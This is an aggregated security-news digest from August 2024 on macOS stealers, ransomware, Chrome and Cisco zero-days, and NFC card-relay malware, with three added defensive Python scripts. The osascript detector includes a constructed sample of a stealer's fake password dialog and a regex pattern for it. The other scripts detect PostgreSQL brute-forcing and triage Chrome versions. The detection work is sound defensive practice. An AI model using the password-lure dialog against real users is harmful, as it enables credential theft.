          Cybersecurity researchers have uncovered a new information stealer that's designed to target Apple macOS hosts and harvest a wide range of information, underscoring how threat actors are increasingly setting their sights on the operating system. Dubbed Cthulhu Stealer, the malware has been available under a malware-as-a-service (MaaS) model for $500 a month from late 2023. It's capable of "

          Autosummary: Users who end up launching the unsigned file after explicitly allowing it to be run – i.e., bypassing Gatekeeper protections – are prompted to enter their system password, an osascript-based technique that has been adopted by Atomic Stealer, Cuckoo, MacStealer, and Banshee Stealer. "
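          The osascript password prompt described above is an AppleScript `display dialog ... default answer "" with hidden answer`, and it shows up verbatim on the process command line when the stealer passes the script with -e. The check below classifies process-execution events on that basis and, for the evasive variant where the script is read from a file or stdin instead, flags temp or dot-directory paths at lower confidence. It is an added example, not code from Cado Security's write-up or from the malware; the event records and their field names (pid, parent, cmdline) are constructed for the demonstration and do not follow any particular EDR or unified-log schema.

```python
"""Flag osascript invocations that look like a password-prompt lure.

Added example, not Cado Security's code. Cthulhu Stealer and the other
stealers named in the item prompt for the password with AppleScript's
`display dialog ... with hidden answer`; this classifies process events by
the osascript command line. Event records and field names are constructed.
"""
import os
import re
import shlex
from typing import Any, Dict, List, Optional, Tuple

# `display dialog` with `hidden answer` is a masked text field, i.e. a
# password prompt. DOTALL because multi-line -e scripts are common.
PROMPT_RE = re.compile(r"display\s+dialog\b.*\bhidden\s+answer", re.IGNORECASE | re.DOTALL)
# Script files run from temp, per-user cache or dot-directories deserve a look.
SHADY_PATH_RE = re.compile(r"^/(private/)?(tmp|var/folders)/|/\.")


def classify(event: Dict[str, Any]) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for a suspicious osascript run, else None."""
    try:
        argv = shlex.split(event["cmdline"])
    except ValueError:            # unbalanced quotes: fall back to a crude split
        argv = event["cmdline"].split()
    if not argv or os.path.basename(argv[0]) != "osascript":
        return None
    # Inline script text is every argument that follows a -e flag.
    inline = " ".join(a for i, a in enumerate(argv) if i > 0 and argv[i - 1] == "-e")
    if PROMPT_RE.search(inline):
        return ("high", f"password-style prompt via osascript, launched by {event.get('parent', '?')}")
    if "-e" not in argv:
        script = next((a for a in argv[1:] if not a.startswith("-")), None)
        if script is None or script == "-":
            return ("medium", "osascript reading its script from stdin; inspect the parent process")
        if SHADY_PATH_RE.search(script):
            return ("medium", f"osascript running a script from {script}")
    return None


def scan(events: List[Dict[str, Any]]) -> List[Tuple[Any, str, str]]:
    """Apply classify() to a batch and return (pid, severity, reason) hits."""
    hits = []
    for e in events:
        verdict = classify(e)
        if verdict:
            hits.append((e["pid"],) + verdict)
    return hits


# Constructed events: a benign dialog, the lure, a script from a hidden temp
# file, and a developer running a script from their own directory.
SAMPLE_EVENTS = [
    {"pid": 501, "parent": "/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor",
     "cmdline": "osascript -e 'display dialog \"Backup finished\" buttons {\"OK\"}'"},
    {"pid": 777, "parent": "/Volumes/Setup/Setup",
     "cmdline": "osascript -e 'display dialog \"macOS needs your password to finish installing.\" "
                "default answer \"\" with hidden answer with icon caution'"},
    {"pid": 778, "parent": "/Volumes/Setup/Setup",
     "cmdline": "osascript /private/tmp/.p.scpt"},
    {"pid": 900, "parent": "/bin/zsh",
     "cmdline": "osascript /Users/dev/Scripts/deploy.scpt --verbose"},
]

if __name__ == "__main__":
    for pid, severity, reason in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: [{severity}] {reason}")
```

          The high-severity rule is the one to alert on: legitimate software does not ask for the login password through an AppleScript dialog, and a parent process living on a mounted DMG (as in the second event) is exactly the delivery path the item describes. The medium rules are triage hints for the case where the script body is not visible on the command line.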


          New malware Cthulhu Stealer targets Apple macOS users

          exploits
          2024-08-23 https://securityaffairs.com/167454/malware/cthulhu-stealer-targets-apple-macos.html
          Cado Security found a new info stealer, called Cthulhu Stealer, that targets Apple macOS and steals a wide range of information. Cado Security researchers have discovered a malware-as-a-service (MaaS) targeting macOS users dubbed Cthulhu Stealer. Cthulhu Stealer targets macOS users via an Apple disk image (DMG) that disguises itself as legitimate software. The researchers spotted […] "

          Autosummary: These include browser cookies, which can give attackers access to user sessions and stored passwords, and numerous cryptocurrency wallets such as Coinbase, MetaMask, Wasabi, Binance, Daedalus, Electrum, Atomic, Harmony, Enjin, Hoo, Dapper, Coinomi, Trust, Blockchain, and XDeFI wallets highlighting the malware’s focus on exploiting financial data. "


          China-linked APT Velvet Ant exploited zero-day to compromise Cisco switches

          exploits
          2024-08-23 https://securityaffairs.com/167423/apt/china-velvet-ant-zero-day-cisco-switches.html
          China-linked APT group Velvet Ant exploited a recently disclosed zero-day in Cisco switches to take over the network appliance. Researchers at cybersecurity firm Sygnia reported that the China-linked APT group Velvet Ant has exploited the recently disclosed zero-day CVE-2024-20399 in Cisco switches to take over the network devices. In July 2024, Cisco addressed the NX-OS zero-day CVE-2024-20399 […] "

          Autosummary: The vulnerability impacts the following devices: MDS 9000 Series Multilayer Switches (CSCwj97007); Nexus 3000 Series Switches (CSCwj97009); Nexus 5500 Platform Switches (CSCwj97011); Nexus 5600 Platform Switches (CSCwj97011); Nexus 6000 Series Switches (CSCwj97011); Nexus 7000 Series Switches (CSCwj94682); Nexus 9000 Series Switches in standalone NX-OS mode (CSCwj97009). Cisco recommends customers monitor the use of credentials for the administrative users network-admin and vdc-admin. China-linked APT Velvet Ant exploited zero-day to compromise Cisco switches (Pierluigi Paganini, August 23, 2024). "


          Another critical SolarWinds Web Help Desk bug fixed (CVE-2024-28987)

          exploits
          2024-08-23 https://www.helpnetsecurity.com/2024/08/23/cve-2024-28987/

          A week after SolarWinds released a fix for a critical code-injection-to-RCE vulnerability (CVE-2024-28986) in Web Help Desk (WHD), another patch for another critical flaw (CVE-2024-28987) in the company’s IT help desk solution has been pushed out. CVE-2024-28987 stems from Web Help Desk having hardcoded credentials that can be misused by remote unauthenticated users to access internal functionality and modify data. The vulnerability was reported by Horizon3.ai vulnerability researcher Zach Hanley, after digging into … More

          The post Another critical SolarWinds Web Help Desk bug fixed (CVE-2024-28987) appeared first on Help Net Security.

          "

          Autosummary: "


          Webinar: Experience the Power of a Must-Have All-in-One Cybersecurity Platform

          ciber
          2024-08-23 https://thehackernews.com/2024/08/webinar-experience-power-of-must-have.html
          Let's be honest. The world of cybersecurity feels like a constant war zone. You're bombarded by threats, scrambling to keep up with patches, and drowning in an endless flood of alerts. It's exhausting, isn’t it? But what if there was a better way? Imagine having every essential cybersecurity tool at your fingertips, all within a single, intuitive platform, backed by expert support 24/7. This is "

          Autosummary: Here's what you'll witness: Simulating real-world threats: watch how the platform detects, investigates, and neutralizes attacks in real time. "


          New Qilin Ransomware Attack Uses VPN Credentials, Steals Chrome Data

          exploits ransomware
          2024-08-23 https://thehackernews.com/2024/08/new-qilin-ransomware-attack-uses-vpn.html
          The threat actors behind a recently observed Qilin ransomware attack have stolen credentials stored in Google Chrome browsers on a small set of compromised endpoints. The use of credential harvesting in connection with a ransomware infection marks an unusual twist, and one that could have cascading consequences, cybersecurity firm Sophos said in a Thursday report. The attack, detected in July "

          Autosummary: Indeed, Coveware said over 10% of the incidents handled by the company in Q2 2024 were unaffiliated, meaning they were "attributed to attackers that were deliberately operating independently of a specific brand and what we typically term 'lone wolves.'" "Continued takedowns of cybercriminal forums and marketplaces shortened the lifecycle of criminal sites, as the site administrators try to avoid drawing law enforcement (LE) attention," Europol said in an assessment released last month. "Once the attacker reached the domain controller in question, they edited the default domain policy to introduce a logon-based Group Policy Object (GPO) containing two items," researchers Lee Kirkpatrick, Paul Jacobs, Harshal Gosalia, and Robert Weiland said. "


          US oil giant Halliburton confirms cyberattack behind systems shutdown

          industry ciber
          2024-08-23 https://www.bleepingcomputer.com/news/security/us-oil-giant-halliburton-confirms-cyberattack-behind-systems-shutdown/
          Halliburton, one of the world's largest providers of services to the energy industry, has confirmed a cyberattack that forced it to shut down some of its systems earlier this week. [...] "

          Autosummary: "On August 21, 2024, Halliburton Company (the "Company") became aware that an unauthorized third party gained access to certain of its systems," the oil services giant said in a filing with the U.S. Securities and Exchange Commission (SEC). "


          Russian laundering millions for Lazarus hackers arrested in Argentina

          latam rusia-ucrania
          2024-08-23 https://www.bleepingcomputer.com/news/legal/russian-laundering-millions-for-lazarus-hackers-arrested-in-argentina/
          The federal police in Argentina (PFA) have arrested a 29-year-old Russian national in Buenos Aires, who is facing money laundering charges related to cryptocurrency proceeds of the notorious North Korean hackers' Lazarus Group. [...] "

          Autosummary: "


          Microsoft shares temp fix for Linux boot issues on dual-boot systems

          Linux
          2024-08-23 https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-temp-fix-for-linux-boot-issues-on-dual-boot-systems/
          Microsoft shared a workaround for Linux boot issues triggered by August security updates on dual-boot systems with Secure Boot enabled [...] "

          Autosummary: For those who have already installed the August 2024 Windows updates and can no longer boot Linux on their dual-boot devices, Microsoft recommends deleting the SBAT update and ensuring that future SBAT updates will no longer be installed. "


          Fake funeral “live stream” scams target grieving users on Facebook

          financial
          2024-08-23 https://www.malwarebytes.com/blog/news/2024/08/fake-funeral-live-stream-scams-target-grieving-users-on-facebook
          Facebook scammers are posting links to fake funeral live streams to get victims to sign up for paid services or steal credit card details "

          Autosummary: Associated domains. Fake streaming sites: Qtvlivestreamhd[.]com, Hqonlivestream[.]xyz, Visitpageaus[.]com, Auseventstream[.]com. Phishing sites: pbg4jptrk[.]com, paperpadpen[.]com. The National Association of Funeral Directors says: “You shouldn’t have to pay to view a funeral live stream and official links will be provided via the funeral director to the bereaved family.” Adding the domain to the exclusion list allowed me to follow through, and I ended up on a site that wants you to sign up for your “favorite movies” so that I could allegedly get full access. "


          Qilin ransomware steals credentials stored in Google Chrome

          exploits ransomware
          2024-08-23 https://securityaffairs.com/167496/cyber-crime/qilin-ransomware-steal-google-chrome-passwords.html
          Sophos researchers investigated a Qilin ransomware attack that led to the theft of credentials stored in Google Chrome browsers. Sophos researchers investigated a Qilin ransomware attack where operators stole credentials stored in Google Chrome browsers of a limited number of compromised endpoints. The experts pointed out that the credential harvesting activity is usually not […] "

          Autosummary: Qilin ransomware steals credentials stored in Google Chrome (Pierluigi Paganini, August 23, 2024). "


          Phishing attacks target mobile users via progressive web applications (PWA)

          financial
          2024-08-23 https://securityaffairs.com/167472/cyber-crime/phishing-relies-progressive-web-applications.html
          Cybercriminals use progressive web applications (PWA) to impersonate banking apps and steal credentials from mobile users. ESET researchers detailed a phishing campaign against mobile users that uses Progressive Web Applications (PWAs). The threat actors used fake apps almost indistinguishable from real banking apps on both iOS and Android. The technique was first disclosed in Poland in […] "

          Autosummary: Phishing attacks target mobile users via progressive web applications (PWA) (Pierluigi Paganini, August 23, 2024). For Android users, this can be a WebAPK, while for both iOS and Android users, it may be a Progressive Web Application (PWA). "


          PWA phishing on Android and iOS – Week in security with Tony Anscombe

          financial
          2024-08-23 https://www.welivesecurity.com/en/videos/pwa-phishing-on-android-and-ios-week-in-security-with-tony-anscombe/
          Phishing using PWAs? ESET Research's latest discovery might just ruin some users' assumptions about their preferred platform's security "

          Autosummary: "


          Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations

          exploits ransomware
          2024-08-23 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a

          Summary

          The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that, as of August 2024, a group of Iran-based cyber actors continues to exploit U.S. and foreign organizations. This includes organizations across several sectors in the U.S. (including in the education, finance, healthcare, and defense sectors as well as local government entities) and other countries (including in Israel, Azerbaijan, and the United Arab Emirates). The FBI assesses a significant percentage of these threat actors’ operations against US organizations are intended to obtain and develop network access to then collaborate with ransomware affiliate actors to deploy ransomware. The FBI further assesses these Iran-based cyber actors are associated with the Government of Iran (GOI) and—separate from the ransomware activity—conduct computer network exploitation activity in support of the GOI (such as intrusions enabling the theft of sensitive technical data against organizations in Israel and Azerbaijan).

          This CSA provides the threat actor’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs), as well as highlights similar activity from a previous advisory (Iran-Based Threat Actor Exploits VPN Vulnerabilities) that the FBI and CISA published on Sept. 15, 2020. The information and guidance in this advisory are derived from FBI investigative activity and technical analysis of this group’s intrusion activity against U.S. organizations and engagements with numerous entities impacted by this malicious activity.

          The FBI recommends all organizations follow guidance provided in the Mitigations section of this advisory to defend against the Iranian cyber actors’ activity.

          If organizations belie "

          Autosummary: The actors’ initial access is usually obtained via exploiting a public-facing networking device, such as Citrix Netscaler (CVE-2019-19781 and CVE-2023-3519), F5 BIG-IP (CVE-2022-1388), Pulse Secure/Ivanti VPNs (CVE-2024-21887), and, more recently, PanOS firewalls (CVE-2024-3400). Execution, Privilege Escalation, and Defense Evasion: repurpose compromised credentials from exploiting networking devices, such as Citrix Netscaler, to log into other applications (i.e., Citrix XenDesktop). Exfiltration and Impact: after infiltrating victim networks, the actors collaborate with ransomware affiliates (including NoEscape, Ransomhouse, and ALPHV [aka BlackCat]) in exchange for a percentage of the ransom payments by providing affiliates with access to victim networks, locking victim networks, and strategizing to extort victims [T1657]. "


          Most ransomware attacks occur between 1 a.m. and 5 a.m.

          exploits ransomware
          2024-08-22 https://www.helpnetsecurity.com/2024/08/22/ransomware-attacks-time/

          There’s been an alarming increase in ransomware attacks over the past year, alongside significant shifts in the tactics and strategies employed by cybercriminals that underscore the necessity for organizations to implement around-the-clock monitoring and investigation of suspicious behaviors, according to a new Malwarebytes report. “Ransomware gangs have time and motivation on their side. They constantly evolve to respond to the latest technologies chasing at their tails,” said Marcin Kleczynski, CEO, Malwarebytes. “We’ve seen this distinctly … More

          The post Most ransomware attacks occur between 1 a.m. and 5 a.m. appeared first on Help Net Security.

          "

          Autosummary: There’s been an alarming increase in ransomware attacks over the past year, alongside significant shifts in the tactics and strategies employed by cybercriminals that underscore the necessity for organizations to implement around-the-clock monitoring and investigation of suspicious behaviors, according to a new Malwarebytes report. "


          Google Fixes High-Severity Chrome Flaw Actively Exploited in the Wild

          exploits
          2024-08-22 https://thehackernews.com/2024/08/google-fixes-high-severity-chrome-flaw.html
          Google has rolled out security fixes to address a high-severity security flaw in its Chrome browser that it said has come under active exploitation in the wild. Tracked as CVE-2024-7971, the vulnerability has been described as a type confusion bug in the V8 JavaScript and WebAssembly engine. "Type confusion in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to exploit heap "

          Autosummary: "


          New Malware PG_MEM Targets PostgreSQL Databases for Crypto Mining

          exploits
          2024-08-22 https://thehackernews.com/2024/08/new-malware-pgmem-targets-postgresql.html
          Cybersecurity researchers have unpacked a new malware strain dubbed PG_MEM that's designed to mine cryptocurrency after brute-forcing their way into PostgreSQL database instances. "Brute-force attacks on Postgres involve repeatedly attempting to guess the database credentials until access is gained, exploiting weak passwords," Aqua security researcher Assaf Morag said in a technical report. "

          Autosummary: "
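          The brute-force pattern Aqua describes is visible in the PostgreSQL server log before any miner is dropped: a run of "password authentication failed" lines from one client address, then a "connection authorized" from the same address once a password lands. The script below turns that into two alerts, one for the burst and a louder one for a success following it. It is an added example, not Aqua Security's or PG_MEM's code. The log lines are constructed; the parser assumes `log_line_prefix = '%m [%p] %u@%d %h '` and `log_connections = on` in postgresql.conf (adjust LINE_RE for other prefixes), while the message texts themselves are PostgreSQL's own.

```python
"""Detect PostgreSQL password brute-forcing from server log lines.

Added example, not Aqua Security's or PG_MEM's code. Keeps a sliding window
of failed password authentications per client address, alerts on a burst,
and alerts again if that address is later authorized. Log lines are
constructed; LINE_RE assumes log_line_prefix = '%m [%p] %u@%d %h '.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, Iterable, List, Set, Tuple

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ \S+ \[\d+\] "
    r"(?P<user>\S+)@(?P<db>\S+) (?P<host>\S+) (?P<level>[A-Z]+):\s+(?P<msg>.*)$")
# Message texts are PostgreSQL's own.
FAILED_RE = re.compile(r'password authentication failed for user "([^"]+)"')
AUTHORIZED_RE = re.compile(r"connection authorized: user=(\S+) database=(\S+)")


def detect_bruteforce(lines: Iterable[str], threshold: int = 5,
                      window: timedelta = timedelta(minutes=1)) -> List[Tuple[str, str, str]]:
    """Return (client host, alert kind, detail) tuples in log order.

    'burst'               : at least `threshold` failed logins from one host inside `window`
    'success_after_burst' : that host was later authorized, i.e. a password was probably guessed
    """
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    users_tried: Dict[str, Set[str]] = defaultdict(set)
    bursting: Set[str] = set()
    alerts: List[Tuple[str, str, str]] = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                  # DETAIL/HINT continuation lines, other prefixes
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        host = m["host"]
        failed = FAILED_RE.search(m["msg"])
        if failed:
            q = recent[host]
            q.append(ts)
            users_tried[host].add(failed.group(1))
            while q and ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and host not in bursting:
                bursting.add(host)
                alerts.append((host, "burst",
                               f"{len(q)} failed logins within {window}; users tried: "
                               f"{', '.join(sorted(users_tried[host]))}"))
            continue
        ok = AUTHORIZED_RE.search(m["msg"])
        if ok and host in bursting:
            alerts.append((host, "success_after_burst",
                           f"user {ok.group(1)} authorized to database {ok.group(2)} "
                           f"after a brute-force burst"))
    return alerts


# Constructed log: one typo from an internal host, a five-guess burst from an
# external address that then succeeds, and an unrelated application login.
SAMPLE_LOG = """\
2024-08-20 10:15:01.101 UTC [4101] postgres@postgres 10.0.0.5 FATAL:  password authentication failed for user "postgres"
2024-08-20 10:15:30.212 UTC [4102] postgres@postgres 203.0.113.7 FATAL:  password authentication failed for user "postgres"
2024-08-20 10:15:31.330 UTC [4103] postgres@postgres 203.0.113.7 FATAL:  password authentication failed for user "postgres"
2024-08-20 10:15:32.448 UTC [4104] admin@postgres 203.0.113.7 FATAL:  password authentication failed for user "admin"
2024-08-20 10:15:33.566 UTC [4105] postgres@postgres 203.0.113.7 FATAL:  password authentication failed for user "postgres"
2024-08-20 10:15:34.684 UTC [4106] postgres@postgres 203.0.113.7 FATAL:  password authentication failed for user "postgres"
2024-08-20 10:15:35.802 UTC [4107] postgres@postgres 203.0.113.7 LOG:  connection authorized: user=postgres database=postgres
2024-08-20 10:16:10.009 UTC [4108] app@orders 10.0.0.20 LOG:  connection authorized: user=app database=orders
"""

if __name__ == "__main__":
    for host, kind, detail in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{host}: {kind}: {detail}")
```

          The detection only matters if the database is reachable in the first place; the same item's remedy is to restrict `host` entries in pg_hba.conf to the networks that need access and to use `scram-sha-256` rather than `md5` or `trust`, so a guessed-password burst never gets the chance to turn into the second alert.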


          Android malware uses NFC to steal money at ATMs

          financial exploits
          2024-08-22 https://www.helpnetsecurity.com/2024/08/22/android-malware-nfc-data-atm-withdrawals/

          ESET researchers uncovered NGate malware, which can relay data from victims’ payment cards via a malicious app installed on their Android devices to the attacker’s rooted Android phone. Attack overview (Source: ESET) Unauthorized ATM withdrawals The campaign’s primary goal in targeting banks was facilitating unauthorized ATM withdrawals from the victims’ bank accounts. This was achieved by relaying NFC data from the victims’ physical payment cards via their compromised Android smartphones using the NGate Android malware … More

          The post Android malware uses NFC to steal money at ATMs appeared first on Help Net Security.

          "

          Autosummary: The technique is based on a tool called NFCGate, designed by students at the Technical University of Darmstadt, Germany, to capture, analyze, or alter NFC traffic; therefore, we named this new malware family NGate,” says Lukáš Štefanko, who discovered the novel threat and technique.This means checking URLs of websites, downloading apps from official stores, keeping PIN codes secret, using security apps on smartphones, turning off the NFC function when it is not needed, using protective cases, or using virtual cards protected by authentication,” advises Štefanko. "


          New Chrome zero-day actively exploited, patch quickly! (CVE-2024-7971)

          exploits
          2024-08-22 https://www.helpnetsecurity.com/2024/08/22/cve-2024-7971/

          A new Chrome zero-day vulnerability (CVE-2024-7971) exploited by attackers in the wild has been fixed by Google. About CVE-2024-7971 CVE-2024-7971 is a high-severity vulnerability caused by a type confusion weakness in V8, the open-source JavaScript and WebAssembly engine developed by Google for the Chromium and Google Chrome web browsers. “In languages without memory safety, such as C and C++, type confusion can lead to out-of-bounds memory access,” Mitre explains the problem. (V8 is written in … More

          The post New Chrome zero-day actively exploited, patch quickly! (CVE-2024-7971) appeared first on Help Net Security.

          "

          Autosummary: About CVE-2024-7971 CVE-2024-7971 is a high-severity vulnerability caused by a type confusion weakness in V8, the open-source JavaScript and WebAssembly engine developed by Google for the Chromium and Google Chrome web browsers. "


          The Facts About Continuous Penetration Testing and Why It’s Important

          ransomware
          2024-08-22 https://thehackernews.com/2024/08/the-facts-about-continuous-penetration.html
          What is Continuous Attack Surface Penetration Testing or CASPT? Continuous Penetration Testing or Continuous Attack Surface Penetration Testing (CASPT) is an advanced security practice that involves the continuous, automated, and ongoing penetration testing services of an organization's digital assets to identify and mitigate security vulnerabilities. CASPT is designed for enterprises with an "

          Autosummary: How CASPT is Applied Across Different Assets: Continuous Attack Surface Penetration Testing can be applied across a variety of digital assets, including web applications, where continuous testing helps in identifying vulnerabilities like SQL injection, cross-site scripting (XSS), and broken authentication mechanisms. The benefits of integrating CASPT with other offensive security tools like ASM and red teaming are significant, including a reduced attack surface, increased resilience to withstand real-world attacks, cost-efficiencies from reduced breaches and operational downtime, and meeting regulatory requirements by providing ongoing evidence of security practices and vulnerability management. High-Value Targets Scenario: organizations that are considered high-value targets for cyberattacks, such as those in finance, healthcare, government, or technology sectors. Regulatory and Compliance Requirements Scenario: industries with strict compliance standards, such as finance, healthcare, or critical infrastructure, where maintaining high levels of security is mandatory. Unlike traditional penetration testing, which is often performed annually or semi-annually, CASPT is an ongoing process that integrates directly into the software development lifecycle (SDLC), ensuring that vulnerabilities are discovered and addressed in real time or near real time. By adopting a proactive, continuous approach to penetration testing, organizations can stay ahead of emerging threats, improve their security development cycle, and protect their most valuable assets. Attack Path Validation and Mapping: more innovative CASPT providers offer organizations continuous validation of their attack paths, with an automatic visualization that maps out all potential routes an attacker might take to compromise critical assets from domains, subdomains, IP addresses, and discovered vulnerabilities. What Continuous Attack Surface Penetration Testing is Not: while CASPT shares similarities with traditional penetration testing, there are distinct differences. Not a One-Time Assessment: traditional penetration testing is typically a one-time assessment conducted periodically. "


          Microsoft confirms August updates break Linux boot in dual-boot systems

          Linux
          2024-08-22 https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-august-updates-break-linux-boot-in-dual-boot-systems/
Microsoft has confirmed the August 2024 Windows security updates are causing Linux booting issues on dual-boot systems with Secure Boot enabled. [...]



          Google patches actively exploited zero-day in Chrome. Update now!

          exploits
          2024-08-22 https://www.malwarebytes.com/blog/news/2024/08/google-patches-actively-exploited-zero-day-in-chrome-update-now
Google has released an update to Chrome that fixes one zero-day vulnerability and introduces Google Lens for desktop.

Autosummary: After the update, the version should be 128.0.6613.84/85 or later. Besides the zero-day, this update contains 37 other security fixes, as well as Google Lens for desktop.
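The version check the item above describes, written out as an added example (this is not code from Malwarebytes or Google): a small Python triage that parses the version string an endpoint reports and compares it numerically against the fixed build. The inventory dict is constructed; the cut-off 128.0.6613.84 is the lower of the two fixed builds named above. Numeric comparison is the whole point: a plain string comparison ranks 128.0.6613.9 above 128.0.6613.84 and would mark an unpatched host as safe.

```python
# Added example: classify reported Chrome versions against the fixed build.
import re
from typing import Optional

# Lower of the two fixed builds named in the advisory (…84 and …85); anything
# at or above it is treated as patched.
FIXED_VERSION = "128.0.6613.84"

_VERSION_RE = re.compile(r"(\d+(?:\.\d+){1,3})")


def parse_version(text: str) -> Optional[tuple]:
    """Extract a dotted version from text such as the output of
    `google-chrome --version` ("Google Chrome 128.0.6613.84") and return it
    as a tuple of ints, or None if no version is present."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def is_patched(reported: str, fixed: str = FIXED_VERSION) -> bool:
    """True if `reported` is at or above `fixed`, comparing field by field."""
    r = parse_version(reported)
    f = parse_version(fixed)
    if r is None or f is None:
        return False  # unknown version: never assume it is patched
    # Pad the shorter tuple with zeros so "128.0" compares against 4-part versions
    width = max(len(r), len(f))
    r = r + (0,) * (width - len(r))
    f = f + (0,) * (width - len(f))
    return r >= f


def triage(inventory: dict) -> dict:
    """Map host -> 'patched' | 'vulnerable' | 'unknown' for a dict of
    host -> raw version string as gathered by an inventory tool."""
    result = {}
    for host, text in inventory.items():
        if parse_version(text) is None:
            result[host] = "unknown"
        elif is_patched(text):
            result[host] = "patched"
        else:
            result[host] = "vulnerable"
    return result


# Constructed sample inventory (hypothetical hosts, not real data).
SAMPLE_INVENTORY = {
    "ws-01": "Google Chrome 128.0.6613.84",
    "ws-02": "Google Chrome 128.0.6613.85",
    "ws-03": "Google Chrome 127.0.6533.120",
    "ws-04": "Google Chrome 128.0.6613.9",   # sorts after .84 as a string, is older
    "ws-05": "Google Chrome 129.0.6668.12",
    "ws-06": "chrome not installed",
}

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: {status}")
```

Feed `triage()` whatever your endpoint agent returns for the Chrome binary; hosts that come back `unknown` need a manual look rather than a pass.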


          QNAP releases QTS 5.2 to prevent data loss from ransomware threats

          exploits ransomware
          2024-08-22 https://www.helpnetsecurity.com/2024/08/22/qnap-qts-5-2-nas/

          QNAP has released the QTS 5.2 NAS operating system. A standout feature of this release is the debut of Security Center, which actively monitors file activities and thwarts ransomware threats. Additionally, system security receives a boost with the inclusion of support for TCG-Ruby self-encrypting drives (SED). Extensive optimizations have been implemented to streamline operations, configuration, and management processes, significantly elevating the overall user experience. “We greatly appreciate the invaluable feedback provided by our dedicated QTS … More


Autosummary: “We greatly appreciate the invaluable feedback provided by our dedicated QTS 5.2 beta testers, which has been instrumental in putting the finishing touches on this official release,” said Tim Lin, Product Manager of QNAP, adding “QNAP remains committed to ensuring our data storage and management solutions stay current, offering dependable NAS storage solutions that meet the heightened expectations of today’s users.”


          Chinese Hackers Exploit Zero-Day Cisco Switch Flaw to Gain System Control

          exploits
          2024-08-22 https://thehackernews.com/2024/08/chinese-hackers-exploit-zero-day-cisco.html
Details have emerged about a China-nexus threat group's exploitation of a recently disclosed, now-patched security flaw in Cisco switches as a zero-day to seize control of the appliance and evade detection. The activity, attributed to Velvet Ant, was observed early this year and involved the weaponization of CVE-2024-20399 (CVSS score: 6.0) to deliver bespoke malware and gain extensive control

          Autosummary: "


          New "ALBeast" Vulnerability Exposes Weakness in AWS Application Load Balancer

          exploits
          2024-08-22 https://thehackernews.com/2024/08/new-albeast-vulnerability-exposes.html
As many as 15,000 applications using Amazon Web Services' (AWS) Application Load Balancer (ALB) for authentication are potentially susceptible to a configuration-based issue that could let attackers sidestep access controls and compromise the applications. That's according to findings from Israeli cybersecurity company Miggo, which dubbed the problem ALBeast. "This vulnerability allows attackers to

Autosummary: "If you didn't lock down your Exchange Online organization to accept mail only from your third-party service, or if you didn't enable enhanced filtering for connectors, anyone could send an email to you through ourcompany.protection.outlook.com or ourcompany.mail.protection.outlook.com, and DMARC (SPF and DKIM) verification will be skipped," the company said.


          A cyberattack disrupted operations of US chipmaker Microchip Technology

          ciber
          2024-08-22 https://securityaffairs.com/167369/hacking/cyberattack-disrupted-operations-microchip-technology.html
Semiconductor manufacturer Microchip Technology announced that its operations were disrupted by a cyberattack. U.S. chipmaker Microchip Technology suffered a cyberattack that disrupted operations at several of its manufacturing plants. The company detected potentially suspicious activity involving its IT infrastructure on August 17, 2024. The attack severely impacted the production capacity of the company, which shut […]

Autosummary: Its wafer fabs are located in Tempe, Arizona; Gresham, Oregon; and Colorado Springs, Colorado.


          Google addressed the ninth actively exploited Chrome zero-day this year

          exploits
          2024-08-22 https://securityaffairs.com/167403/hacking/9th-chrome-zero-day-2024-html.html
Google released emergency security updates to fix the ninth actively exploited Chrome zero-day vulnerability this year. Google released an emergency security update to address a Chrome zero-day vulnerability, tracked as CVE-2024-7971, that is actively exploited. The vulnerability is a type confusion issue that resides in Chrome’s V8 JavaScript engine. “Google is aware that an exploit for CVE-2024-7971 […]

Autosummary: (March 2024) CVE-2024-4671: a use-after-free issue that resides in the Visuals component (May 2024). By Pierluigi Paganini, August 22, 2024.


          New NGate Android malware uses NFC chip to steal credit card data

          exploits
          2024-08-22 https://www.bleepingcomputer.com/news/security/new-ngate-android-malware-uses-nfc-chip-to-steal-credit-card-data/
A new Android malware named NGate can steal money from payment cards by relaying to an attacker's device the data read by the near-field communication (NFC) chip. [...]

Autosummary: Stealing card data via NFC chip. The attacks start with malicious texts, automated calls with pre-recorded messages, or malvertising to trick victims into installing a malicious PWA, and later WebAPKs, on their devices.


          Hardcoded Credential Vulnerability Found in SolarWinds Web Help Desk

          exploits
          2024-08-22 https://thehackernews.com/2024/08/hardcoded-credential-vulnerability.html
SolarWinds has issued patches to address a new security flaw in its Web Help Desk (WHD) software that could allow remote unauthenticated users to gain unauthorized access to susceptible instances. "The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing [a] remote unauthenticated user to access internal functionality and modify data," the company



          Qilin ransomware now steals credentials from Chrome browsers

          exploits ransomware
          2024-08-22 https://www.bleepingcomputer.com/news/security/qilin-ransomware-now-steals-credentials-from-chrome-browsers/
The Qilin ransomware group has been using a new tactic and deploys a custom stealer to steal account credentials stored in the Google Chrome browser. [...]

Autosummary: Such extensive credential theft could enable follow-up attacks, lead to widespread breaches across multiple platforms and services, make response efforts a lot more cumbersome, and introduce a lingering, long-lasting threat after the ransomware incident is resolved.


          A cyberattack hit US oil giant Halliburton

          industry ciber
